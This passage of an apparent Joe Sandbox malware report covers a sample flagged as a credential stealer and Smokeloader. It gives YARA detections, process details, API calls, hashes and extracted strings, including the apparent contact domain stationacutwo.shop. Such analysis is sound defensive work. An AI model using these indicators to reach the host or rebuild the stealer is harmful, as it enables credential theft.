00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:02:12
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 1568
Imagebase:	0xa10000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	9%
Signature Coverage:	34.6%
Total number of Nodes:	312
Total number of Limit Nodes:	23

Executed Functions

Function 0040A660 Relevance: 23.0, Strings: 18, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A%R;, xrefs: 0040AB4F
,Y._, xrefs: 0040ABB2
AQNW, xrefs: 0040ABC8
3A%G, xrefs: 0040AB9C
YC, xrefs: 0040A874
hvkg, xrefs: 0040A798
>M(C, xrefs: 0040AB91
P!D', xrefs: 0040AB47
VU, xrefs: 0040ABD3
)N/, xrefs: 0040AB37
z1{7, xrefs: 0040AB70
0, xrefs: 0040A6D6
de, xrefs: 0040AC7F
", xrefs: 0040A921
X=G3, xrefs: 0040AB65
R5OK, xrefs: 0040AB7B
%]kS, xrefs: 0040ABBD
9E?[, xrefs: 0040ABA7

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: )N/$"$%]kS$,Y._$0$3A%G$9E?[$>M(C$A%R;$AQNW$P!D'$R5OK$VU$X=G3$YC$de$hvkg$z1{7
API String ID: 0-4040250002
Opcode ID: 97f5a6ce12027b1d62e85dbb73286aa3f6bff4621bd1d976b55b5b735b64c0dc
Instruction ID: c80a80122ea38f6177d6778402e845d1a0914cd77fa5e5881f2d0bf96c569a28
Opcode Fuzzy Hash: 97f5a6ce12027b1d62e85dbb73286aa3f6bff4621bd1d976b55b5b735b64c0dc
Instruction Fuzzy Hash: 920235B1618381ABD314CF24C590B5BBBE2ABC5708F589D2EE4C98B392D778D805CB57

Function 0042EA70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042EB0C
GetSystemMetrics.USER32 ref: 0042EB1D
DeleteObject.GDI32 ref: 0042EB85
SelectObject.GDI32 ref: 0042EBDF
SelectObject.GDI32 ref: 0042EC6D
DeleteObject.GDI32 ref: 0042ECAA

Strings

, xrefs: 0042EC3A

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction ID: d51dbaa2c5b2c570c410d49e690ffe92d78ef2a0a1b3f72f1bead9a24340eeae
Opcode Fuzzy Hash: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction Fuzzy Hash: FC914AB4A15B008FD364EF29D985A16BBF0FB49700B104A6DE99AC7760D731F848CF96

Function 00420CED Relevance: 11.8, Strings: 9, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:Y![, xrefs: 00420D6C
O=M?, xrefs: 00420D2D
F-[/, xrefs: 00420D49
A5B7, xrefs: 00420D1F
789:, xrefs: 00421150
C%g', xrefs: 00420D3B
E)E+, xrefs: 00420D50
p9D;, xrefs: 00420D34
T!o#, xrefs: 00420D42

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 789:$:Y![$A5B7$C%g'$E)E+$F-[/$O=M?$T!o#$p9D;
API String ID: 0-3397566058
Opcode ID: fa2385c6898244b671036684cc899fdee362151f6ceeac9cbbcbb572e10f968d
Instruction ID: e2f5b5d13d7ef941d0bd8941e32a25c7e1ea7d40d2811709b79d41f6151a8d56
Opcode Fuzzy Hash: fa2385c6898244b671036684cc899fdee362151f6ceeac9cbbcbb572e10f968d
Instruction Fuzzy Hash: 6F12AEB5200A41DFD724CF29D880B16B7F2FF5A300F55896DE5868BB61D735E862CB88

Function 00418192 Relevance: 10.8, Strings: 8, Instructions: 776
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vgah, xrefs: 004186E0
wtk~, xrefs: 004186C8
IO, xrefs: 00418241
WUVN, xrefs: 00418688
OQCC, xrefs: 00418690
JM, xrefs: 004189D2
_\[D, xrefs: 004186A0
65, xrefs: 004183F4

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 65$JM$OQCC$WUVN$_\[D$vgah$wtk~$IO
API String ID: 0-3661617438
Opcode ID: b85a5297877778b127f564546e861c1b1ee3298dc12179920051627bcd556f1f
Instruction ID: a2e02e5434c27961e1388cfbbe2da7f2cba5738d83c89f8da755f113e25d77e2
Opcode Fuzzy Hash: b85a5297877778b127f564546e861c1b1ee3298dc12179920051627bcd556f1f
Instruction Fuzzy Hash: 8A4267B16083408BC714CF14C8917ABBBE1EFD6358F14891DE8D99B391DB78D985CB8A

Function 00410950 Relevance: 10.4, Strings: 8, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(P, xrefs: 00410C48
IV, xrefs: 00410C4F
]_, xrefs: 00410BCA
BG, xrefs: 00410C5D
YC, xrefs: 00410A42
stationacutwo.shop, xrefs: 00410D64
O], xrefs: 00410C56
MJK, xrefs: 00410A62

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: (P$BG$IV$MJK$O]$YC$stationacutwo.shop$]_
API String ID: 0-3710986456
Opcode ID: 432b1084d3cb6012353411014e7ca03366d81e9c1885a1027ebfdc2d1456500b
Instruction ID: ea2c913badcb648db7674b3253bb285aba1c5eb39d8bb8dbe8534b586dedb8e0
Opcode Fuzzy Hash: 432b1084d3cb6012353411014e7ca03366d81e9c1885a1027ebfdc2d1456500b
Instruction Fuzzy Hash: 50D1BC741047818FD729CF29C4A0762BBF2FF5A304F28859DD4D68B756C379A886CB98

Function 00418C50 Relevance: 9.2, Strings: 7, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Bmrs, xrefs: 00419098
$]&[, xrefs: 00418C82
;I9W, xrefs: 00418C6A
Lm5k, xrefs: 00418CA2
xy, xrefs: 00418CCE
QS, xrefs: 00418E66
!, xrefs: 00418E8A

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: !$$]&[$;I9W$Bmrs$Lm5k$xy$QS
API String ID: 0-3575319576
Opcode ID: fafcce999e0a8d36f5702f2d3733882e903df077a8857d9c90ed2745bcbf272d
Instruction ID: bb8b783e275e5c4daa1cbe93d183a171b09ff602ef2634ad125037ed41c9781c
Opcode Fuzzy Hash: fafcce999e0a8d36f5702f2d3733882e903df077a8857d9c90ed2745bcbf272d
Instruction Fuzzy Hash: 0AC1AA715083018BC718CF04C8A17ABB7F1FF86354F098A1DE8D65B391E7B8A945CB9A

Function 0041003F Relevance: 9.1, Strings: 7, Instructions: 394
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i~}n, xrefs: 004101D6
2]'_, xrefs: 0041040E
wt4e, xrefs: 004101DD
YC, xrefs: 004101B3
stationacutwo.shop, xrefs: 00410491
6)<w, xrefs: 004101EB
qg+#, xrefs: 004101E4

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 2]'_$6)<w$YC$i~}n$qg+#$stationacutwo.shop$wt4e
API String ID: 0-3386725333
Opcode ID: e286607c4219c1cc5ba2255275243be28e9af2c0bb14e65c6f694e93c298af20
Instruction ID: 36ac29d30fc3d7e422e7b7a47710b93391c6666a035071c529703b0e0c95256f
Opcode Fuzzy Hash: e286607c4219c1cc5ba2255275243be28e9af2c0bb14e65c6f694e93c298af20
Instruction Fuzzy Hash: 49D18AB05007418FD724CF29C595762BBF1FF56300F248A9DE9E68B796E334A885CB89

Function 00416C48 Relevance: 8.0, Strings: 6, Instructions: 457
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RnA, xrefs: 00416E3A
mo, xrefs: 00416CC5
ac, xrefs: 00416CDA
8Q/S, xrefs: 00416CBE
0]-_, xrefs: 00416CA9
%U&W, xrefs: 00416CB7

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: mo$%U&W$0]-_$8Q/S$RnA$ac
API String ID: 0-4156691688
Opcode ID: 7538e90b4b3045508a2f6eb23d82356ed09fcd6d5857f4223f1789450fc7c0e5
Instruction ID: 8c71e43de4e9ad3ffef3ee1d2c3325ec954b84490856b0ab1d02feb3fcc9aec5
Opcode Fuzzy Hash: 7538e90b4b3045508a2f6eb23d82356ed09fcd6d5857f4223f1789450fc7c0e5
Instruction Fuzzy Hash: B2E1BFB5600701CFDB28CF29D891A23B3B1FF8A314F15496DE8868B796D779E841CB94

Function 00427141 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 470COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004272B9
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004273DB

Strings

cfbe, xrefs: 004273E8
2PBb, xrefs: 004277CF

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName
String ID: 2PBb$cfbe
API String ID: 3545744682-517685108
Opcode ID: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction ID: 1610c54c3f6f0f38670fb0a8e6c5d4b54b07aa94dac22c9e7c7613111b9be88c
Opcode Fuzzy Hash: 2cccfbb5d267f8f8491c01e49efb610de094c8bfb3e74e625019bdc8333cdebc
Instruction Fuzzy Hash: 74F1AC70608B408FD729CF38D4947A3BBE1AF56305F484A5EC0EB8B392D779A545CB94

Function 0041718B Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 447COMMON

Download Yara Rule

Strings

EEM@, xrefs: 004171E9
^T^S, xrefs: 004171E2
V\V[, xrefs: 004171D4

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: EEM@$V\V[$^T^S
API String ID: 0-230699993
Opcode ID: ccf80ed68dac886a282f95193fbc2da4200521102890dfd6e28ddc938b950d87
Instruction ID: eb79208d4950bb4854f23a5550480fb08d5f962a35a96431f028d450b0c8bc53
Opcode Fuzzy Hash: ccf80ed68dac886a282f95193fbc2da4200521102890dfd6e28ddc938b950d87
Instruction Fuzzy Hash: 3DF1DEB56047018FC728CF28C891A67B7F2FF4A304B14496DE9968BB92E738F851CB54

Function 00422290 Relevance: 5.5, Strings: 4, Instructions: 494COMMON

Download Yara Rule

Strings

#", xrefs: 0042243C
!\, xrefs: 00422444
789:, xrefs: 00422939, 004228EE, 00422A3D, 004229EE, 004227F0, 004227F4
-', xrefs: 00422434

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: !\$#"$-'$789:
API String ID: 0-2824663564
Opcode ID: bcba76b88e172dd218a7e03e5ef90819769e197a953dc4e85f3a55ce00643fc4
Instruction ID: b827f668b81c3dec2976a3d6333a79c599a5891d8a0a68d9fa0b390b96e918fc
Opcode Fuzzy Hash: bcba76b88e172dd218a7e03e5ef90819769e197a953dc4e85f3a55ce00643fc4
Instruction Fuzzy Hash: 131285B96083819FD324CF14E95076BBBF1FFC6344F44892DE6858B291D7B99801CB96

Function 0041773E Relevance: 5.5, Strings: 4, Instructions: 478COMMON

Download Yara Rule

Strings

%$', xrefs: 0041782D
mic), xrefs: 00417750
%$', xrefs: 004178FF
agld, xrefs: 00417757

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: agld$mic)$%$'$%$'
API String ID: 0-1514905728
Opcode ID: dc9807ac29ef62bb76d4ed4f46a22d6c7a8bc0c8674cfbf30d9cf4c35bbd1069
Instruction ID: 0b2cf607e9b3e62af25037e3bcf43a7f484840dd48ff8c122ead288a72a71f74
Opcode Fuzzy Hash: dc9807ac29ef62bb76d4ed4f46a22d6c7a8bc0c8674cfbf30d9cf4c35bbd1069
Instruction Fuzzy Hash: 54F1AAB5604A00CFD724CF29C881B62B7F2FF5A304B14896DE58ACB761E739E851CB94

Function 00421570 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

/, xrefs: 00421944
789:, xrefs: 00421686
%, xrefs: 0042194C

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: 789:$%$/
API String ID: 2994545307-3498975593
Opcode ID: 7bae3d62d9e3a96b16918f65e851df328c8a837b036ca12d0924188e5367969a
Instruction ID: 2012c8fc319fd6df49528bb51d26bdfeaeef97fa57471ae4c356f3d16b37e7cf
Opcode Fuzzy Hash: 7bae3d62d9e3a96b16918f65e851df328c8a837b036ca12d0924188e5367969a
Instruction Fuzzy Hash: E6C101B1A083218BD714DF18D88172BB7E1EFA5344F58492EE4C187361E738DC45CB9A

Function 00417D08 Relevance: 4.1, Strings: 3, Instructions: 310COMMON

Download Yara Rule

Strings

3, xrefs: 00417EF3
guc{, xrefs: 00417FE4
crvi, xrefs: 0041804E

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: crvi$guc{$3
API String ID: 0-3059600650
Opcode ID: 80fc19b03d037560023a8b1252c926f381051072d4b9117f1f4bdbe70d0bcafb
Instruction ID: fbf61555d20871bbe670de29a5e21fd6d5673566e70cb8c1ea83b349504c6d69
Opcode Fuzzy Hash: 80fc19b03d037560023a8b1252c926f381051072d4b9117f1f4bdbe70d0bcafb
Instruction Fuzzy Hash: 83C1C47160C3808FD725CF28C4917ABBBE2AF96354F14886EE4C987381DB399985CB57

Function 02A626D6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02A626FE
Module32First.KERNEL32(00000000,00000224), ref: 02A6271E

Memory Dump Source

Source File: 00000000.00000002.2032358738.0000000002A61000.00000040.00000020.00020000.00000000.sdmp, Offset: 02A61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a61000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: fb74543f6cf016faa953557964997c5bc5da98242288b8878be4cc0717e1195c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 64F06D36600711ABDB203BB9A8CCB7A76E9FF49665F140568EA42914C0EFB0E9458A61

Function 00405460 Relevance: 3.0, Strings: 2, Instructions: 451COMMON

Download Yara Rule

Strings

IEND, xrefs: 00405932
), xrefs: 00405511

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 16bcc219153f6663a690a2a811f9bb54df817882529dfb6b1e0768e6b1d4e99f
Instruction ID: 2a24ab453b063afa7a8689a56f2f51f929f5c9e3ed0011153af5ecb657667a5e
Opcode Fuzzy Hash: 16bcc219153f6663a690a2a811f9bb54df817882529dfb6b1e0768e6b1d4e99f
Instruction Fuzzy Hash: 4FF1CD72A087449BD714DF28D88175BBBE1EB88304F04853EF995AB3C2D778E905CB86

Function 00416380 Relevance: 1.6, Strings: 1, Instructions: 377COMMON

Download Yara Rule

Strings

2fA, xrefs: 00416624

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 2fA
API String ID: 0-3939653067
Opcode ID: 7e0dafa471e33073af746cdb24f01ddcbc91cad63a9e656eb0726acfeba2d656
Instruction ID: 6e87ad54de88920b9dc91c26a49410a5ce87ea97c590b2840975a0399f4ace3a
Opcode Fuzzy Hash: 7e0dafa471e33073af746cdb24f01ddcbc91cad63a9e656eb0726acfeba2d656
Instruction Fuzzy Hash: 00910F76904201DBC7249F04DC926BB73B5FF86318F0A452EF88687391E338E944C79A

Function 00438180 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043AE3C,005C003F,00000006,?,?,00000018,B2B5B4B7,?,ZdA), ref: 004381A6

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 0041FF85 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7a58fd43d6a9bea96ebee46fc4f7f3595c1e4fe59dcd0031fea07064906405
Instruction ID: 4112d752c4675042c9f4d24d64b470d7a1d2ac2eba366108b29385767195248f
Opcode Fuzzy Hash: 4f7a58fd43d6a9bea96ebee46fc4f7f3595c1e4fe59dcd0031fea07064906405
Instruction Fuzzy Hash: 9122BC74600B02CFC325CF28D490A62F3F1FF4A700B958A9ED5868B762D775E995CB98

Function 0043B630 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 735903d85c6c12ae1beb1e5a25f33d9c922830ceda3cf16339f4dc6c6c1eb05e
Instruction ID: b363dca51ce9b49509a4814d49c578aaa114a8ed5c317b07c574f91d9f8079a9
Opcode Fuzzy Hash: 735903d85c6c12ae1beb1e5a25f33d9c922830ceda3cf16339f4dc6c6c1eb05e
Instruction Fuzzy Hash: F781F371A083128BCB18DF18C890B6BB3E1EF89714F19892DE68197361D734AC11CBDA

Function 0041B260 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f816c9c2602662edfd577c5af2055069c217f887fee277f4ee90bda54e8cf0d
Instruction ID: 84abbc84113cd253d1960b160f4c71acde79016d7e8c2a58b427b786811391ed
Opcode Fuzzy Hash: 7f816c9c2602662edfd577c5af2055069c217f887fee277f4ee90bda54e8cf0d
Instruction Fuzzy Hash: F441D1715083148BC7148F14D89169FB7F0EFC6368F048A2DF8A95B391E3789A45C7DA

Function 0042A44A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d73a3f6f43b8cd5716e36789ca69acfa64243595167bfdada45ff7ee3e3a7e
Instruction ID: ea47b46d9d554172c195231156708c2e28ac3cfc9c4fadd90a88fea462715d45
Opcode Fuzzy Hash: 90d73a3f6f43b8cd5716e36789ca69acfa64243595167bfdada45ff7ee3e3a7e
Instruction Fuzzy Hash: C5F08CB110A702CBC311CF25C54434BBBE2BBC4314F55982DD4954B385C778B649CB89

Function 043E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 043E024D

Strings

kernel32.dll, xrefs: 043E008F, 043E0095
cess, xrefs: 043E018D

Memory Dump Source

Source File: 00000000.00000002.2032685971.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_43e0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bb90b36b78d926d5e18937ae0af7a38ddb14d74ad0a3ac81c12703c1066e144a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F7526A74A01229DFDB64CF69C984BACBBB1BF09304F1480D9E54DAB391DB70AA85DF14

Function 0042714B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 00427276
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004272B9
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004273DB

Strings

cfbe, xrefs: 004273E8
2PBv, xrefs: 00427170

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: 2PBv$cfbe
API String ID: 2243422189-2258403321
Opcode ID: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction ID: d15ebabd98d3d14068800f9dbe7adda6ca9b2282baa7fc7a6769f676d58a1832
Opcode Fuzzy Hash: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction Fuzzy Hash: 7DF1BB70608F508ED725CF34D894BE3BBE1AF56305F484A9EC0EB8B292D779A405CB54

Function 0043409F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2

Strings

C, xrefs: 0043409F
\, xrefs: 004340AD
:, xrefs: 004340A6

Memory Dump Source

Source File: 00000000.00000002.2031060860.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2031060860.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

